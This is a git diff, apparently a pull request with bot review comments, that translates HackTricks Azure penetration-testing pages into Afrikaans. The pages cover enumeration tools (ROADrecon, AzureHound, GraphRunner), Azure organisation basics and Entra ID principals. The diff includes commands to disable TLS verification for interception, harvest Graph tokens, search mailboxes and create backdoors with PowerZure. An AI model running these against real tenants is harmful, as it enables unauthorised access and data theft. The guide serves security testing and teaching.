Dit is tyd om uit te vind watter dienste in die omgewing gebruik word.\ +> In die volgende afdeling kan jy 'n paar maniere kyk om **'n paar algemene dienste te enumerate.** ## App Service SCM -Kudu console to log in to the App Service 'container'. +Kudu-konsol om in te log in die App Service 'houer'. ## Webshell -Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account. +Gebruik portal.azure.com en kies die shell, of gebruik shell.azure.com, vir 'n bash of powershell. Die 'skyf' van hierdie shell word as 'n beeldlĂȘer in 'n stoorrekening gestoor. ## Azure DevOps -Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets. +Azure DevOps is apart van Azure. Dit het repositories, pipelines (yaml of release), borde, wiki, en meer. Veranderlike Groepe word gebruik om veranderlike waardes en geheime te stoor. ## Debug | MitM az cli -Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: - +Deur die parameter **`--debug`** te gebruik, is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur, te sien: ```bash az account management-group list --output table --debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: +Om 'n **MitM** na die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen: {{#tabs }} {{#tab name="Bash" }} - ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 
@@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080" openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem ``` - {{#endtab }} {{#tab name="PS" }} - ```bash $env:ADAL_PYTHON_SSL_NO_VERIFY=1 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 $env:HTTPS_PROXY="http://127.0.0.1:8080" $env:HTTP_PROXY="http://127.0.0.1:8080" ``` - {{#endtab }} {{#endtabs }} -## Automated Recon Tools +## Geoutomatiseerde Verkenning Gereedskap ### [**ROADRecon**](https://github.com/dirkjanm/ROADtools) - ```powershell cd ROADTools pipenv shell @@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!" roadrecon gather roadrecon gui ``` - ### [Monkey365](https://github.com/silverhack/monkey365) - ```powershell Import-Module monkey365 Get-Help Invoke-Monkey365 @@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML ``` - ### [**Stormspotter**](https://github.com/Azure/Stormspotter) - ```powershell # Start Backend cd stormspotter\backend\ @@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022! python stormspotter\stormcollector\sscollector.pyz cli # This will generate a .zip file to upload in the frontend (127.0.0.1:9091) ``` - ### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound) - ```powershell # You need to use the Az PowerShell and Azure AD modules: $passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force 
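Review bot: The first hunk (the `-One of the first things you need to know` block) mixes two unrelated changes: the translation of the sentence and the removal of the blank lines that separated `{{#tab name="az cli" }}` / `{{#endtab }}` from the fenced blocks (the lone `-` lines). Splitting the whitespace cleanup into its own commit would make the translation reviewable on its own, and the same pattern repeats in the `@@ -90,22` hunk and through the tool sections.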
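Review bot: In the `@@ -121,53` hunk the translated MitM sentence attaches "manually" to the wrong verb: `Om 'n **MitM** na die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer` says the tool sends the requests manually, whereas the original says the reader checks them manually; suggest `... en **al die versoeke** wat dit stuur handmatig te kontroleer`. Two smaller points in the same hunk: the untouched context heading `### ENtra ID Enumeration` still carries the "ENtra" capitalisation typo and could be corrected to `Entra ID` while this section is edited, and the portal label is translated to "Alle hulpbronne" although the original quotes the portal's own label "All resources"; keep the label as the UI shows it (or quote both) so readers can find the view the link points at.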
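Review bot: In the `@@ -180,25` hunk the `PS` tab keeps a ```bash fence around PowerShell content (`$env:ADAL_PYTHON_SSL_NO_VERIFY=1`, `$env:HTTPS_PROXY="http://127.0.0.1:8080"`); tag it ```powershell like the other PowerShell blocks on the page. Since both tabs disable certificate verification for the CLI (`ADAL_PYTHON_SSL_NO_VERIFY=1`, `AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1`) and redirect it to a local proxy, a one-line note that these variables are meant for the intercepting session only and should be unset afterwards, not persisted in a shell profile, would keep readers from leaving `az` running without TLS validation.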
@@ -294,9 +275,7 @@ MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu ## All Azure AD Groups that are synchronized with On-Premise AD MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n ``` - ### [Azucar](https://github.com/nccgroup/azucar) - ```bash # You should use an account with at least read-permission on the assets you want to access git clone https://github.com/nccgroup/azucar.git @@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials # resolve the TenantID for an specific username PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com ``` - ### [**MicroBurst**](https://github.com/NetSPI/MicroBurst) - ``` Import-Module .\MicroBurst.psm1 Import-Module .\Get-AzureDomainInfo.ps1 Get-AzureDomainInfo -folder MicroBurst -Verbose ``` - ### [**PowerZure**](https://github.com/hausec/PowerZure) - ```powershell Connect-AzAccount ipmo C:\Path\To\Powerzure.psd1 @@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest # Administrator $ Create-Backdoor, Execute-Backdoor ``` - ### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner) - ```powershell #Get-GraphTokens @@ -398,9 +371,4 @@ Get-TenantID -Domain #Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams. Invoke-GraphRunner -Tokens $tokens ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-basic-information/README.md b/src/pentesting-cloud/azure-security/az-basic-information/README.md index a600b66dc..20709f347 100644 --- a/src/pentesting-cloud/azure-security/az-basic-information/README.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/README.md 
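Review bot: In the `@@ -309,17` hunk the MicroBurst block is fenced with a bare ``` while the neighbouring tool blocks use ```powershell; tag it ```powershell so `Import-Module .\MicroBurst.psm1` and the following lines are highlighted consistently. In the same hunk the Azucar block is tagged ```bash although its last lines are PowerShell with `PS>` prompts (`PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com`), and the comment `# resolve the TenantID for an specific username` should read `a specific`; the commit only touches the blank lines around these blocks, so this is a good moment to fix them.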
@@ -1,376 +1,372 @@ -# Az - Basic Information +# Az - Basiese Inligting {{#include ../../../banners/hacktricks-training.md}} -## Organization Hierarchy +## Organisasie HiĂ«rargie

https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png

-### Management Groups +### Bestuursgroepe -- It can contain **other management groups or subscriptions**. -- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group. -- **10,000 management** groups can be supported in a single directory. -- A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level. -- Each management group and subscription can support **only one parent**. -- Even if several management groups can be created **there is only 1 root management group**. - - The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**. -- All subscriptions within a single management group must trust the **same Entra ID tenant.** +- Dit kan **ander bestuursgroepe of subskripsies** bevat. +- Dit maak dit moontlik om **governance beheer** soos RBAC en Azure-beleid een keer op die bestuursgroepvlak toe te pas en dit **geĂ«rf** te laat word deur al die subskripsies in die groep. +- **10,000 bestuurs** groepe kan in 'n enkele gids ondersteun word. +- 'n Bestuursgroepboom kan **tot ses vlakke diepte** ondersteun. Hierdie limiet sluit nie die wortelvlak of die subskripsievlak in nie. +- Elke bestuursgroep en subskripsie kan **slegs een ouer** ondersteun. +- Alhoewel verskeie bestuursgroepe geskep kan word, is daar **slegs 1 wortel bestuursgroep**. +- Die wortel bestuursgroep **bevat** al die **ander bestuursgroepe en subskripsies** en **kan nie verskuif of verwyder** word nie. +- Alle subskripsies binne 'n enkele bestuursgroep moet die **dieselfde Entra ID huur** vertrou.

https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

-### Azure Subscriptions +### Azure Subskripsies -- It’s another **logical container where resources** (VMs, DBs
) can be run and will be billed. -- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions. -- It **trust only one Entra ID** directory -- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription +- Dit is 'n ander **logiese houer waar hulpbronne** (VM's, DB's
) gedra kan word en gefaktureer sal word. +- Sy **ouer** is altyd 'n **bestuursgroep** (en dit kan die wortel bestuursgroep wees) aangesien subskripsies nie ander subskripsies kan bevat nie. +- Dit **vertrou slegs een Entra ID** gids +- **Toestemmings** wat op die subskripsievlak (of enige van sy ouers) toegepas word, word **geĂ«rf** na al die hulpbronne binne die subskripsie -### Resource Groups +### Hulpbron Groepe -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group. +[Van die dokumentasie:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) 'n Hulpbron groep is 'n **houer** wat **verwante hulpbronne** vir 'n Azure-oplossing bevat. Die hulpbron groep kan al die hulpbronne vir die oplossing insluit, of slegs daardie **hulpbronne wat jy as 'n groep wil bestuur**. Oor die algemeen, voeg **hulpbronne** wat die **selfde lewensiklus** deel by die selfde hulpbron groep sodat jy dit maklik kan ontplooi, opdateer, en verwyder as 'n groep. -All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted. +Alle **hulpbronne** moet **binne 'n hulpbron groep** wees en kan slegs aan een groep behoort, en as 'n hulpbron groep verwyder word, word al die hulpbronne daarin ook verwyder.

https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1

-### Azure Resource IDs +### Azure Hulpbron ID's -Every resource in Azure has an Azure Resource ID that identifies it. +Elke hulpbron in Azure het 'n Azure Hulpbron ID wat dit identifiseer. -The format of an Azure Resource ID is as follows: +Die formaat van 'n Azure Hulpbron ID is soos volg: - `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}` -For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this: +Vir 'n virtuele masjien genaamd myVM in 'n hulpbron groep `myResourceGroup` onder subskripsie ID `12345678-1234-1234-1234-123456789012`, lyk die Azure Hulpbron ID soos volg: - `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM` -## Azure vs Entra ID vs Azure AD Domain Services +## Azure vs Entra ID vs Azure AD Domein Dienste ### Azure -Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises. +Azure is Microsoft se omvattende **cloud computing platform, wat 'n wye reeks dienste bied**, insluitend virtuele masjiene, databasisse, kunsmatige intelligensie, en stoor. Dit dien as die grondslag vir die gasheer en bestuur van toepassings, die bou van skaalbare infrastruktuur, en die uitvoering van moderne werklas in die wolk. 
Azure bied gereedskap vir ontwikkelaars en IT-professionals om toepassings en dienste naatloos te skep, te ontplooi, en te bestuur, wat voorsien in 'n verskeidenheid behoeftes van startups tot groot ondernemings. -### Entra ID (formerly Azure Active Directory) +### Entra ID (voorheen Azure Aktiewe Gids) -Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others. +Entra ID is 'n wolk-gebaseerde **identiteit en toegang bestuur diens** wat ontwerp is om autentisering, autorisasie, en gebruikers toegang beheer te hanteer. Dit bied veilige toegang tot Microsoft dienste soos Office 365, Azure, en baie derdeparty SaaS toepassings. Met funksies soos enkel teken-in (SSO), multi-faktor autentisering (MFA), en voorwaardelike toegang beleid onder andere. -### Entra Domain Services (formerly Azure AD DS) +### Entra Domein Dienste (voorheen Azure AD DS) -Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments. +Entra Domein Dienste brei die vermoĂ«ns van Entra ID uit deur **bestuurde domein dienste aan te bied wat versoenbaar is met tradisionele Windows Aktiewe Gids omgewings**. 
Dit ondersteun ouer protokolle soos LDAP, Kerberos, en NTLM, wat organisasies in staat stel om ouer toepassings in die wolk te migreer of te laat loop sonder om plaaslike domein kontrollers te ontplooi. Hierdie diens ondersteun ook Groep Beleid vir gesentraliseerde bestuur, wat dit geskik maak vir scenario's waar ouer of AD-gebaseerde werklas saam met moderne wolkomgewings moet bestaan. ## Entra ID Principals -### Users +### Gebruikers -- **New users** - - Indicate email name and domain from selected tenant - - Indicate Display name - - Indicate password - - Indicate properties (first name, job title, contact info
) - - Default user type is “**member**” -- **External users** - - Indicate email to invite and display name (can be a non Microsft email) - - Indicate properties - - Default user type is “**Guest**” +- **Nuwe gebruikers** +- Dui e-pos naam en domein van die geselekteerde huur aan +- Dui Vertoonnaam aan +- Dui wagwoord aan +- Dui eienskappe aan (voornaam, posbeskrywing, kontakbesonderhede
) +- Standaard gebruiker tipe is “**lid**” +- **Buitelandse gebruikers** +- Dui e-pos aan om uit te nooi en vertoonnaam (kan 'n nie-Microsoft e-pos wees) +- Dui eienskappe aan +- Standaard gebruiker tipe is “**Gaste**” -### Members & Guests Default Permissions +### Lede & Gaste Standaard Toestemmings -You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to: +Jy kan dit nagaan in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) maar onder andere aksies sal 'n lid in staat wees om: -- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties -- Invite Guests (_can be turned off_) -- Create Security groups -- Read non-hidden Group memberships -- Add guests to Owned groups -- Create new application (_can be turned off_) -- Add up to 50 devices to Azure (_can be turned off_) +- Lees alle gebruikers, Groepe, Toepassings, Toestelle, Rolle, Subskripsies, en hul publieke eienskappe +- Nooi Gaste (_kan afgeskakel word_) +- Skep Sekuriteitsgroepe +- Lees nie-verborgene Groep lidmaatskappe +- Voeg gaste by Besit groepe +- Skep nuwe toepassing (_kan afgeskakel word_) +- Voeg tot 50 toestelle by Azure (_kan afgeskakel word_) > [!NOTE] -> Remember that to enumerate Azure resources the user needs an explicit grant of the permission. +> Onthou dat om Azure hulpbronne te tel, die gebruiker 'n eksplisiete toekenning van die toestemming benodig. 
-### Users Default Configurable Permissions +### Gebruikers Standaard Konfigureerbare Toestemmings -- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** - - Register Applications: Default **Yes** - - Restrict non-admin users from creating tenants: Default **No** - - Create security groups: Default **Yes** - - Restrict access to Microsoft Entra administration portal: Default **No** - - This doesn’t restrict API access to the portal (only web) - - Allow users to connect work or school account with LinkedIn: Default **Yes** - - Show keep user signed in: Default **Yes** - - Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings) - - Read other users: Default **Yes** (via Microsoft Graph) -- **Guests** - - **Guest user access restrictions** - - **Guest users have the same access as members** grants all member user permissions to guest users by default. - - **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed. - - **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one. 
- - **Guests can invite** - - **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default** - - **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions** - - **Only users assigned to specific admin roles can invite guest users** - - **No one in the organization can invite guest users including admins (most restrictive)** - - **External user leave**: Default **True** - - Allow external users to leave the organization +- **Lede (**[**dokumente**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** +- Registreer Toepassings: Standaard **Ja** +- Beperk nie-admin gebruikers van die skep van huurders: Standaard **Nee** +- Skep sekuriteitsgroepe: Standaard **Ja** +- Beperk toegang tot Microsoft Entra administrasie portaal: Standaard **Nee** +- Dit beperk nie API toegang tot die portaal nie (slegs web) +- Laat gebruikers toe om werk of skool rekening met LinkedIn te verbind: Standaard **Ja** +- Toon hou gebruiker ingelog: Standaard **Ja** +- Beperk gebruikers van die herstel van die BitLocker sleutel(s) vir hul besit toestelle: Standaard Nee (kyk in Toestel Instellings) +- Lees ander gebruikers: Standaard **Ja** (deur Microsoft Graph) +- **Gaste** +- **Gaste gebruiker toegang beperkings** +- **Gaste gebruikers het dieselfde toegang as lede** gee alle lid gebruiker toestemmings aan gaste gebruikers per standaard. +- **Gaste gebruikers het beperkte toegang tot eienskappe en lidmaatskappe van gids objekte (standaard)** beperk gaste toegang tot slegs hul eie gebruikersprofiel per standaard. Toegang tot ander gebruikers en groep inligting is nie meer toegelaat nie. +- **Gaste gebruiker toegang is beperk tot eienskappe en lidmaatskappe van hul eie gids objekte** is die mees beperkende een. 
+- **Gaste kan nooi** +- **Enige iemand in die organisasie kan gaste gebruikers nooi insluitend gaste en nie-admins (mees inklusief) - Standaard** +- **Lid gebruikers en gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi insluitend gaste met lid toestemmings** +- **Slegs gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi** +- **Niemand in die organisasie kan gaste gebruikers nooi insluitend admins (mees beperkende)** +- **Buitelandse gebruiker verlaat**: Standaard **Waar** +- Laat buitelandse gebruikers toe om die organisasie te verlaat > [!TIP] -> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions. +> Alhoewel dit per standaard beperk is, kan gebruikers (lede en gaste) met toegekenne toestemmings die vorige aksies uitvoer. -### **Groups** +### **Groepe** -There are **2 types of groups**: +Daar is **2 tipes groepe**: -- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members. -- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users. - - This will have an **email address** with the domain of the EntraID tenant. +- **Sekuriteit**: Hierdie tipe groep word gebruik om lede toegang te gee tot toepassings, hulpbronne en om lisensies toe te ken. Gebruikers, toestelle, diens prinsipale en ander groepe kan lede wees. +- **Microsoft 365**: Hierdie tipe groep word gebruik vir samewerking, wat lede toegang gee tot 'n gedeelde posbus, kalender, lĂȘers, SharePoint webwerf, ensovoorts. Groep lede kan slegs gebruikers wees. +- Dit sal 'n **e-pos adres** hĂȘ met die domein van die EntraID huur. 
-There are **2 types of memberships**: +Daar is **2 tipes lidmaatskappe**: -- **Assigned**: Allow to manually add specific members to a group. -- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change. +- **Toegeken**: Laat toe om spesifieke lede handmatig aan 'n groep toe te voeg. +- **Dinamiese lidmaatskap**: Bestuur lidmaatskap outomaties met behulp van reĂ«ls, wat die groep insluiting opdateer wanneer lede se eienskappe verander. -### **Service Principals** +### **Diens Prinsipale** -A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity. +'n **Diens Prinsipaal** is 'n **identiteit** geskep vir **gebruik** met **toepassings**, gehoste dienste, en geoutomatiseerde gereedskap om toegang tot Azure hulpbronne te verkry. Hierdie toegang is **beperk deur die rolle wat aan die diens prinsipaal toegeken is**, wat jou beheer gee oor **watter hulpbronne toegang verkry** en op watter vlak. Om veiligheidsredes, word dit altyd aanbeveel om **diens prinsipale met geoutomatiseerde gereedskap te gebruik** eerder as om hulle toe te laat om met 'n gebruikersidentiteit aan te meld. -It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it. +Dit is moontlik om **direk as 'n diens prinsipaal aan te meld** deur 'n **geheim** (wagwoord), 'n **sertifikaat**, of deur **federale** toegang aan derdeparty platforms (bv. Github Actions) oor dit te verleen. 
-- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again. -- If you choose certificate authentication, make sure the **application will have access over the private key**. +- As jy **wagwoord** autentisering kies (per standaard), **stoor die gegenereerde wagwoord** aangesien jy dit nie weer kan toegang nie. +- As jy sertifikaat autentisering kies, maak seker dat die **toepassing toegang sal hĂȘ oor die private sleutel**. -### App Registrations +### App Registrasies -An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions. +'n **App Registrasie** is 'n konfigurasie wat 'n toepassing toelaat om met Entra ID te integreer en aksies uit te voer. -#### Key Components: +#### Sleutel Komponente: -1. **Application ID (Client ID):** A unique identifier for your app in Azure AD. -2. **Redirect URIs:** URLs where Azure AD sends authentication responses. -3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions). - 1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID). -4. **API Permissions:** Specifies what resources or APIs the app can access. -5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect). -6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant. - 1. The **service principal** will get all the requested permissions it was configured with. +1. **Toepassing ID (KliĂ«nt ID):** 'n Unieke identifiseerder vir jou app in Azure AD. +2. 
**Herlei URIs:** URL's waar Azure AD autentisering antwoorde stuur. +3. **Sertifikate, Geheimen & Federale Kredite:** Dit is moontlik om 'n geheim of 'n sertifikaat te genereer om as die diens prinsipaal van die toepassing aan te meld, of om federale toegang aan dit te verleen (bv. Github Actions). +1. As 'n **sertifikaat** of **geheim** gegenereer word, is dit moontlik vir 'n persoon om **as die diens prinsipaal** met CLI gereedskap aan te meld deur die **toepassing ID**, die **geheim** of **sertifikaat** en die **huur** (domein of ID) te ken. +4. **API Toestemmings:** Spesifiseer watter hulpbronne of API's die app kan toegang. +5. **Autentisering Instellings:** Definieer die app se ondersteunde autentisering vloei (bv., OAuth2, OpenID Connect). +6. **Diens Prinsipaal**: 'n diens prinsipaal word geskep wanneer 'n App geskep word (as dit vanaf die webkonsol gedoen word) of wanneer dit in 'n nuwe huur geĂŻnstalleer word. +1. Die **diens prinsipaal** sal al die gevraagde toestemmings wat dit geconfigureer is, ontvang. -### Default Consent Permissions +### Standaard Toestemming Toestemmings -**User consent for applications** +**Gebruiker toestemming vir toepassings** -- **Do not allow user consent** - - An administrator will be required for all apps. -- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)** - - All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization. - - **Default** low impact permissions (although you need to accept to add them as low): - - User.Read - sign in and read user profile - - offline_access - maintain access to data that users have given it access to - - openid - sign users in - - profile - view user's basic profile - - email - view user's email address -- **Allow user consent for apps (Default)** - - All users can consent for any app to access the organization's data. 
+- **Moet nie gebruiker toestemming toelaat nie** +- 'n Administrateur sal vir alle apps benodig word. +- **Laat gebruiker toestemming toe vir apps van geverifieerde uitgewers, vir geselekteerde toestemmings (Aanbeveel)** +- Alle gebruikers kan toestemming gee vir toestemmings wat as "lae impak" geklassifiseer is, vir apps van geverifieerde uitgewers of apps wat in hierdie organisasie geregistreer is. +- **Standaard** lae impak toestemmings (alhoewel jy moet aanvaar om hulle as laag by te voeg): +- User.Read - teken in en lees gebruikersprofiel +- offline_access - hou toegang tot data wat gebruikers toegang gegee het +- openid - teken gebruikers in +- profile - sien gebruiker se basiese profiel +- email - sien gebruiker se e-pos adres +- **Laat gebruiker toestemming toe vir apps (Standaard)** +- Alle gebruikers kan toestemming gee vir enige app om toegang tot die organisasie se data te verkry. -**Admin consent requests**: Default **No** +**Admin toestemming versoeke**: Standaard **Nee** -- Users can request admin consent to apps they are unable to consent to -- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests - - Configure also if users will receive email notifications and expiration reminders +- Gebruikers kan admin toestemming versoek vir apps waartoe hulle nie toestemming kan gee nie +- As **Ja**: Dit is moontlik om Gebruikers, Groepe en Rolle aan te dui wat toestemming versoeke kan gee +- Konfigureer ook of gebruikers e-pos kennisgewings en vervaldatums herinneringe sal ontvang -### **Managed Identity (Metadata)** +### **Bestuurde Identiteit (Metadata)** -Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. 
This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure. +Bestuurde identiteite in Azure Aktiewe Gids bied 'n oplossing vir **outomatiese bestuur van die identiteit** van toepassings. Hierdie identiteite word deur toepassings gebruik om te **verbinde** met **hulpbronne** wat versoenbaar is met Azure Aktiewe Gids (**Azure AD**) autentisering. Dit maak dit moontlik om **die behoefte aan hardkoding van wolk akrediteer** in die kode te verwyder aangesien die toepassing in staat sal wees om die **metadata** diens te kontak om 'n geldige token te **verrig** as die aangeduide bestuurde identiteit in Azure. -There are two types of managed identities: +Daar is twee tipes bestuurde identiteite: -- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you. -- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**. +- **Stelsel-toegeken**. Sommige Azure dienste laat jou toe om 'n **bestuurde identiteit direk op 'n diens instansie** in te skakel. 
Wanneer jy 'n stelsel-toegeken bestuurde identiteit inskakel, word 'n **diens prinsipaal** geskep in die Entra ID huur wat deur die subskripsie vertrou word waar die hulpbron geleĂ« is. Wanneer die **hulpbron** verwyder word, verwyder Azure outomaties die **identiteit** vir jou. +- **Gebruiker-toegeken**. Dit is ook moontlik vir gebruikers om bestuurde identiteite te genereer. Hierdie word binne 'n hulpbron groep binne 'n subskripsie geskep en 'n diens prinsipaal sal in die EntraID geskep word wat deur die subskripsie vertrou word. Dan kan jy die bestuurde identiteit aan een of **meer instansies** van 'n Azure diens toeken. Vir gebruiker-toegeken bestuurde identiteite, word die **identiteit apart bestuur van die hulpbronne wat dit gebruik**. -Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it. +Bestuurde Identiteite **genereer nie ewige akrediteer** (soos wagwoorde of sertifikate) om toegang te verkry as die diens prinsipaal wat aan dit geheg is. -### Enterprise Applications +### Enterprise Toepassings -It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to. +Dit is net 'n **tafel in Azure om diens prinsipale te filter** en die toepassings wat aan hulle toegeken is, te kontroleer. -**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities. +**Dit is nie 'n ander tipe "toepassing" nie,** daar is geen objek in Azure wat 'n "Enterprise Toepassing" is nie, dit is net 'n abstraksie om die Diens prinsipale, App registrasies en bestuurde identiteite te kontroleer. -### Administrative Units +### Administratiewe Eenhede -Administrative units allows to **give permissions from a role over a specific portion of an organization**. 
